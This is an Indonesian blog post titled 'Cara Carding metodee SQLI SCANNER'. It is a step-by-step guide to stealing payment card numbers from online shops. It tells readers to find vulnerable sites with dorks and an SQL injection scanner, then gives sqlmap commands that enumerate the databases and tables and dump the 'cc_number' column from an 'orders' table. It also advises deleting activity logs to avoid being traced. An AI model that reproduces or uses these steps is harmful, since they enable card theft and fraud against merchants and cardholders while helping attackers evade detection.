Jumat, 06 Maret 2015

Cara Carding metodee SQLI SCANNER

Malem guysss .......udah lama kagak posting tentang tips dan trik nih gw.....panggil aja gwa X-Lennox
malam ini gwa posting mengenai Carding (pencurian kartu ATM) .gw share turo ini hanya untuk pengetahuan ya...!!! apabila kalian ketauan ama pihak berwajib tanggung sendiri akibatnya......klo ingin tidak ketauan lu apus aja log aktivitas lu agar nggak kelacak....udah deh basa-basinya...berikut cara-caranya:

alat2nya:
1.Sqli scanner 1 link 4shared
2.dork nya

Pertama ,ambil dork lalu scan menggunakan sqli scanner
Setelah itu kita test URL target dengan memberi kan tanda petik di belakang URL
Nah, web tersebut error saat kita inject.

Kedua, kita eksekusi menggunakan sqlmap dengan perintah:
root@anonym:~#  sqlmap -u http://www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 --dbs
Disini kita mendapatkan 3 database :
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema

Setelah itu kita dump database nya untuk mencari table, dengan perintah:
root@anonym:~#  sqlmap -u http://www.target.com -D namadatabase --tables (disini saya coba database "balboast_gkgcart")
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables

Nah, saya dapat tables nya.
Kita pilih di bagian "orders". Kita ambil columns nya, masukan perintah:
root@anonym:~#  sqlmap.py -u http://www.target.com -D namadatabase -T namatable --columns
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Maka akan muncul database orders.
Nah, sudah muncul. Tinggal kita dump 1 per 1 columnsnya bro :)
Masukkan perintah:
root@anonym:~#  sqlmap.py -u link -D namadatabase -T namatable -C namakolom --dump
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump

Maka nanti cc number akan muncul walau proses agak lama.
 
Krypton's Blog © 2011 Templates | uzanc